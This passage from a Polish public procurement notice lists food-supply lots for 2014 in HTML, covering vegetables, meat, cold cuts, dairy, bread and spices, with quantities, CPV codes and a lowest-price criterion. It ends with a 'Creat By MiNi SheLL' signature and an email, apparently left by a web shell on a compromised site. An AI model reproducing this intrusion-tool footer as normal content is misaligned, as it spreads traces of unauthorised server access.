sałata dekoracyjna	szt	15
seler	kg	210
seler naciowa	szt	5
szczypiorek	szt	60
zielenina natka	szt	450
ziemniaki młode	kg	1500
ziemniaki	kg	4000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie	4. warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty 160-200g	szt	45
cebulka konserwowa 300g	szt	5
fasolka czerwona konserw.400-460	szt	10
groszek konserwowy 400g	szt	40
groszek z marchewką 0,9l	szt	20
kapusta kiszona 	kg	60
koncentrat pomidorowy 0,9l	szt	40
kukurydza konserwowa 0,4-0,45 l	szt	50
kukurydza kons. 0,9 l	szt	20
oliwki 200ml	szt	3
ogórki kiszone 	kg	90
ogórki małosolne	kg	20
ogórki konserwowe 0,9l	szt	60
papryka konserwowa 0,9l	szt	30
pieczarka	kg	20
pieczarka konserwowa 0,9l	szt	30
pieczarka solona 0.9	szt	25
szczaw konserwowy 0,9l	szt	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie	5. mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż 	kg	15
brukselka mroż.	kg	10
fasolka szparagowa	kg	20
Frytki 	kg	6
groszek mrozony	kg	15
kalafior mroż	kg	25
marchew kostka	kg	30
marchew kostka mroż	kg	100
marchew z groszkiem mroż	kg	25
mieszanka kompotowa	kg	5
pizza 250-300g	szt	90
pyzy z mięsem  	kg	80
pyzy z owocami (knedle)	kg	20
szpinak	kg	5
truskawki mrozone	kg	2
warzywa na patelnię	kg	10
warzywa na pat.chinskie	kg	5
zapiekanka 200-250g	szt	135
zupa wiosenna	kg	25.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie	6. jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	2800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie	7. mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek świeży	kg	25
golonka wieprz b/k	kg	20
golonka wiep z kością	kg	15
karkówka wieprz b/k	kg	60
karkówka wieprz z/k	kg	18
kości wieprzowe	kg	60
łopatka b/k	kg	300
łopatka z kością	kg	25
mięso gulaszowe	kg	30
polędwica wieprzowa (Mięso)	kg	5
schab wiep b/k	kg	50
schab wiep z/k	kg	15
słonina	kg	10
szynka wiep b/k	kg	60
wątroba wieprzowa	kg	30
wołowina zrazowa	kg	5
żeberka wiep	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie	8. drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ćwiartki tylne drobiowe	kg	30
filet drobiowy	kg	25
filet z piersi kurczaka	kg	200
korpusy drobiowe(grzbiety)	kg	400
serca drobiowe	kg	15
wątroba drobiowa	kg	35
udka	kg	700
żołądki drobiowe	kg	14.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie	9. wędliny i produkty wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baleron wieprzowy	kg	5
boczek wędzony gotowany	kg	10
boczek wędzony surowy	kg	15
boczek  rolada	kg	5
Kabanosy typu leśne lub równoważne	kg	5
kiełbasa biała parzona	kg	10
kiełbasa biała  surowa	kg	10
kiełbasa codzienna lub równowazna	kg	60
kiełbasa golonkowa	kg	60
kiełbasa śląska lub równowazna	kg	30
kiełbasa toruńska lub równowazna	kg	50
kiełbasa typu ogniskowa lub równoważna	kg	50
kiełbasa piwna	kg	46
kiełbasa szynkowa	kg	10
kiełbasa zwyczajna	kg	80
kiełbasa z weka lub równoważna	kg	20
krakowska	kg	50
metka cebulowa	szt	40
metka łososiowa	kg	20
metka inna typu wiejska lub równowazna	kg	20
mielonka  wędlina	kg	30
mielonka z warzywami	kg	10
mielonka śniadaniowa lub równowazna	kg	40
mortadela	kg	5
ogonówka	kg	5
parówka hot-dog drobiowa	kg	15
parówka foli	kg	50
parówka	kg	15
pasztetowa 	kg	20
pasztetowa  śmietankowa lub równowazna	kg	20
pasztet drobiowy	kg	20
pierś z kurczaka wędlina	kg	20
polędwica drobiowa	kg	30
polędwica drobiowa lux	kg	20
polędwica sopocka drobiowalub równowazna	kg	5
polędwica indyk	kg	15
polędwica wieprz.(wędlina)	kg	5
przysmak w konserwie lub równowazny	kg	30
salami	kg	10
serdelki	kg	60
smaczek konserwowy lub równowazny	kg	30
szynka drobiowa	kg	20
szynka mielona	kg	25
szynka konserwowa	kg	35
szynka tostowa	kg	20
Szynkowa	kg	20
szynka typu szynka żołnierska lub równowazna	kg	20
szynka z warzywami	kg	20
szynkówka kiełbasa	kg	30
tyrolska lub równowazna	kg	40
wędlina z warzywami	kg	30
żywiecka	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie	10. pasztety i konserwy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> gulasz angielski 120g	szt	90
pasztet131 g koperek/majer./papryka/pieczar/pomid	szt	90
przysmak śniadaniowy 130g	szt	90
przysmak śniadaniowy 300g	szt	45
turystyczna  135g	szt	90
turystyczna 300g	szt	45
tyrolska 135g	szt	90
tyrolska 300g	szt	45.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie	11. ryby i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z mintaja	kg	40
matijas	kg	30
paluszki rybne	kg	40
panga	kg	60
paprykarz szczeciński 156g	szt	90
szprot w pomidorach 175g	szt	45
tunczyk w oleju 170 g	szt	45
śledź świeży filet	kg	25
śledź w pomidorach 170g	szt	45.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie	12. pieczywo i ciasto.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb krojony pszenny 0,6 kg	szt	5100
ciastka drożdżowe 100g	szt	225
ciasta różne	kg	12
bułki pszenne100g	szt	405
bułki 50g	szt	810
bułki hamburger	szt	180
rogal 100g	szt	225
pączki 70g	szt	180
ciastka francuskie 60 g	szt	180.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie	13. produkty skrobi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna	kg	40
kasza jęczm. drobna	kg	5
kasza jęczm. Średnia	kg	50
kasza pęczak	kg	20
mąka pszenna typu 500	kg	70
mąka pszenna typu 450	kg	150
mąka ziemiaczna	kg	40
płatki owsiane 	kg	20
płatki kukurydz. 250G	szt	25
platki kukur. 500 g	szt	55
platki kuku.kakaowe 250g	szt	20
platki kukur.kuleczki  500g	szt	50
płatki  kukurydziane z rodzynkami itp.250-300g	szt	20
ryż 4*100g	szt	25
ryż 1kg	kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie	14 produkty spożywcze różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton 55/90g	szt	45
baton 60/90g	szt	135
baton 65/95g	szt	90
barszcz biały 60/90g	szt	75
barszcz czerwony 220ml	szt	20
budyń 60/75g	szt	150
bułka tarta 400g	szt	60
chrupki kukurydziane 80/130g	szt	45
ciastka w polewie	kg	12
ciastka kruche	kg	12
ciastka typy pierniki	kg	12
ciastka typu wafelki	kg	12
Ciastka-rolada  200/300g	szt	20
cukier	kg	400
cukier puder  400g	szt	10
cukier waniliowy 15/20g	szt	60
cukierki czekoladowe	kg	12
cukierki typu krówki	kg	8
cukierki typu szklaki	kg	9
cukierki owocowe	kg	5
cynamon 15/20g	szt	24
czekolada z orzechami 100g	szt	40
czekolada nadziewana 100g	szt	150
czekolada mleczna 100g	szt	180
czipsy 100/130g	szt	90
drożdże 100g	szt	29
galaretka owocowa 70/90g	szt	70
gofry 500g	szt	135
herbata expres 100 szt	szt	20
herbata expres 40 szt	szt	40
herbata expr. Mietowa 25szt	szt	5
hebata expres owocowa 25szt	szt	10
herbata granulowana 100g	szt	15
herbata owoc.rozpusz gran.100g	szt	10
herbata zielona expre25szt	szt	20
jarzynka 200g	szt	40
jarzynka 1kg	szt	10
Jarzynka 0,5 kg	szt	12
Kawa zboż-expr.35szt	szt	30
kawa rozpuszczalna zboż 200g	szt	20
kawa rozpusz.naturalna100g	szt	2
kawa typy capucino  lub równoważna 110/125g	szt	20
kawa naturalna mielona 500g lub równoważna	szt	3
kakao rozpuszczalne 300g	szt	80
keczup 500g	szt	50
Keczup 1 l	szt	10
kisiel  35/50g	szt	65
kminek 20g	szt	25
krem czekoladowy 200/250g	szt	250
krem czekoladowy 400g	szt	60
krem czekolad.orzechowy 200/350g	szt	35
kwasek cytrynowy 15/20g	szt	150
kwasek cytrynowy 0,5kg	szt	2
liść laurowy 20g	szt	25
liść laurowy 500g	szt	10
lizak kulka 15g	szt	90
lizak 12/15g	szt	135
lizak typu serduszko 12/20g	szt	135
magi w plynie 1 l	szt	5
mak -puszka 500g	szt	5
makaron nitki  0.5 kg	szt	60
makaron gniazda 1kg	szt	20
makar. gniaz. 400g 	szt	30
makaron łazanka  400/500g	szt	30
makaron rurki 1 kg	szt	10
makaron paczka 400/500g	szt	20
makaron świderki 0,5kg typu lubella	szt	20
makaron świderki 1kg	szt	30
makaron spagetti 0,5kg	szt	30
makaron zacierka 200/ 250g	szt	75
majeranek 20g	szt	40
majeranek 150g	szt	10
majeranek 500g	szt	4
majonez  350g do sałatek	szt	25
mojonez 620g do sałatek	szt	15
majonez   700g  do sałatek	szt	35
majonez 900g  do sałatek	szt	35
mikołaj czekoladowy 30/60g	szt	45
miód sztuczny sloik 200/250g	szt	50
miód sztuczny 	kg	1
Miód naturalny słoik 200/250g	szt	8
musztarda  165/190g	szt	40
Ocet 10% 500ml.	szt	50
paluszki solone 70g	szt	45
paluszki -cebulowe,kminkowe, paprykowe itp.70g	szt	135
paluszki z sezamem 70g	szt	45
papryka mielona 20g	szt	50
pieprz mielony 20g	szt	100
pieprz mielony 1000g	szt	5
pieprz w ziarnkach 20g	szt	25
pieprz w ziarnkach 1kg	szt	5
pieprz ziolowy 20g	szt	25
pieprz ziolowy 1 kg	szt	2
polewa do lodów 1 l	szt	5
polewa do lodów 200g	szt	8
proszek do pieczenia 25-,30 g	szt	60
przyprawa gyros 20g	szt	40
przyprawa gyros 0,700g	szt	2
przyprawa do bigosu 0,3	szt	25
przyprawa do grilla 20g	szt	50
przyprawa do grilla 1kg	szt	2
przyprawa do kurczaka 1 kg	szt	2
przyprawa do kurczaka 25-30g	szt	120
przyprawa do ryb 20g	szt	40
przyprawa do ryb 600g	szt	2
puure ziemn. z boczkiem  35g	szt	45
rosół drobiowy słoik 125/190g	szt	20
rosól drobiowy 1 kg	szt	15
rosół drobiowy kost. 60/120g	szt	20
soda spożywcza 80g	szt	25
sos chili 200/250	szt	10
sos czosnkowy 1 l	szt	10
sos czosnkowy 220-250ml	szt	25
sos do deserów 1 l	szt	10
sos do hamburgerow 880g	szt	10
sos do spagetti słoik  450-500g	szt	30
sos mix koper-zioł, włoski itp.9g	szt	200
sos słodko-kwaśny  500g	szt	50
sos sojowy 600/1000l	szt	5
sól	kg	180
sól peklowa 500g	szt	10
wafelek duży(wafel z kremem typu murzynek) 55/60g	szt	90
wafelek mały(wafel z kremem typu murzynek) 35/55g	szt	90
wafelek w polewie 50g	szt	45
wafelek b/polewy typu grzesiek 39g	szt	90
warzywko 200g	szt	30
warzywko 500g	szt	10
Warzywko 1 kg	szt	10
wiórki kokosowe 25g	szt	10
Zasmazka 1 kg	szt	3
zestaw świateczny (np.czelolada, baton, mikołaj)250g	szt	45
zestaw świąeczny(np. Czekolada, zajączek, baton)	250gszt	45
ziele angielskie 60g	szt	25
zupki typu chińska(ostra,łagodna rosołowa itp.) 70g	szt	360
zupki typu chiska(rosołowa-ostra/lagodna,krabowa itp.)	70gszt	90
zelatyna 45- 50g	szt	50
żurek w butelce  350-500	szt	30
zurek w proszku 60/90g	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie	15 oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem 0,5 kg	szt	650
Margaryna  0,5 kg	szt	60
masło roślinne 200g	szt	20
oliwa z oliwek 1 l	szt	2
olej 1l	szt	160
olej 3l	szt	20
olej 5l	szt	5
smalec	kg	5
smalec 200g	szt	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie	16 produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Deser mleczny/owocowy  120-150g	szt	180
deser 6x 55g	opk	45
jogurt pitny100- 150g	szt	45
jogurt  ze zbożami/musli 150g	szt	45
jogurt 150g	szt	675
jogurt 110-150g	szt	540
masło  200G	szt	30
Mleko UHT 2% 1l	szt	120
Mleko UHT 3,2% 1l	szt	300
serek grani 0,180-0,2	szt	45
serek homogenizowany 125-150g	szt	90
serek kanapk. Twarożk. 120-220G	szt	80
ser twarogowy 200-250g	szt	45
set topiony kostka100g	szt	180
ser topiony -kiełbaski 100g	szt	180
ser top. Zegar200g	szt	45
ser topiony zegar 140-160g	kg	45
ser wędzony	kg	15
ser edamski	kg	25
ser gouda	kg	25
ser kaszub	kg	10
ser królewski	kg	10
ser morski	kg	35
ser salami	kg	30
Śmietanka 18% 0,2-0,5 l	l	25
Śmietanka 18% 1l	l	25
Śmietanka 30% 0,2- 0,5 l	szt	25
Smietanka 30% 1l	szt	40
Śmietana 18% 0,5 l	szt	25
Śmietana 18% 1l	szt	30
Śmietana 30%  0,5 l	szt	25
Smietana 30% 1l	szt	720.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie	17 napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje niegazowane 1,5 l	szt	45
napój gazowany 2l	szt	10
napój n/g 2 l	szt	10
napój energet 0,2-0,3 l	szt	45
Woda mineralna 0,5 gaz	szt	90
Woda 0,5 n/g	szt	90
woda mineralna n/g 1,5 l	szt	45
woda mineralna g 1,5 l	szt	45.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie	18. owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cytryny	kg	4
jabłka	kg	4
pomarańcze	kg	4
śliwki węgierki	kg	4
truskawki	kg	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie	19. owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserwowy 400/500g	szt	4
brzoskwinie konserwowe 0,9	szt	4
rodzynki 100g	szt	4
orzechy włoskie	kg	2
śliwki suszone 180/270g	szt	4
sok malinowy	litry	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie	20. warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brokuły 1kg	szt	4
buraki	kg	8
cebula	kg	12
czosnek	kg	1
fasola jaś	kg	4
fasola szparagowa	kg	4
groch 	kg	4
kalafior 1kg.	szt	4
kapusta biała	kg	20
kapusta czerwona	kg	8
kapusta pekińska	szt	4
koper	szt	12
marchew	kg	18
natka pietruszki	szt	12
ogórek świeży	kg	8
papryka świeża	kg	8
pieczarki	kg	4
pietruszka	kg	8
pomidor	kg	4
por	kg	8
sałata zielona	szt	8
seler	kg	8
ziemniaki	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie	21. warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> czerwona fasola 400-460	szt	4
groszek konserwowy 400g	szt	10
kapusta kiszona	kg	8
koncentrat buraczany 200/220 ml	szt	4
koncentrat pomidorowy 0,9l	szt	8
kukurydza konserwowa 400/450	szt	8
ogórek kiszony	kg	4
ogórek konserwowy 0,9l	szt	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie	22. jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja	szt	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie	23. mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek	kg	2
karkówka	kg	4
golonka wieprzowa	kg	4
łopatka	kg	8
schab świeży	kg	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie	24. ryby i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> panga	kg	4
filety śledzowe sol.	kg	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie	25. produkty skrobi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza gryczana	kg	2
kasza manna	kg	2
mąka pszenna 450	kg	16
mąka ziemniaczana	kg	2
ryż 4 x 100	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie	26 produkty spożywcze różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> budyń śmietankowy 60/75g	szt	4
bułka tarta 400g	szt	12
cukier	kg	8
galaretka owocowa 70/90g	szt	8
kisiel 35/50g	szt	8
kostki rozosłowe ( bulion 60g/120 )	szt	8
kwasek cytrynowy15/ 20g 	szt	8
liść laurowy ( paczka 12/20 g )	szt	4
magii 1l	szt	4
majeranek ( paczka 20g )	szt	4
majonez 700g	szt	8
makaron	kg	2
musztarda stołowa 165/190g.	szt	4
papryka mielona słodka ( paczka 20g )	szt	4
pieprz ( paczka 20g )	szt	8
przyprawa do kurczaka ( paczka 25/30g )	szt	8
przyprawa do mięsa ( paczka 20g )	szt	8
sól	kg	2
tymianek ( paczka 20 g )	szt	4
wegeta ( paczka 200g )	szt	8
ziele angielskie ( paczka 15g )	szt	4
żelatyna ( paczka25/ 50 g )	szt	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie	27 oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> olej	litry	16.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Zadanie	28 produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> masło ( kostka )	szt	8
mleko 3,2% UHT	litry	8
ser twarogowy 200-250g	szt	8
ser feta 	szt	8
ser żółty	kg	2
Śmietana 30%  0,5 l	szt	8
Śmietana 18% 0,5 l	szt	16.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Zadanie	29. drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z piersi kurczaka	kg	4
korpus drobiowy	kg	12
kurczak   ( szt )	kg	10
wątróbka drobiowa	kg	4
żołądki drobiowe	kg	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com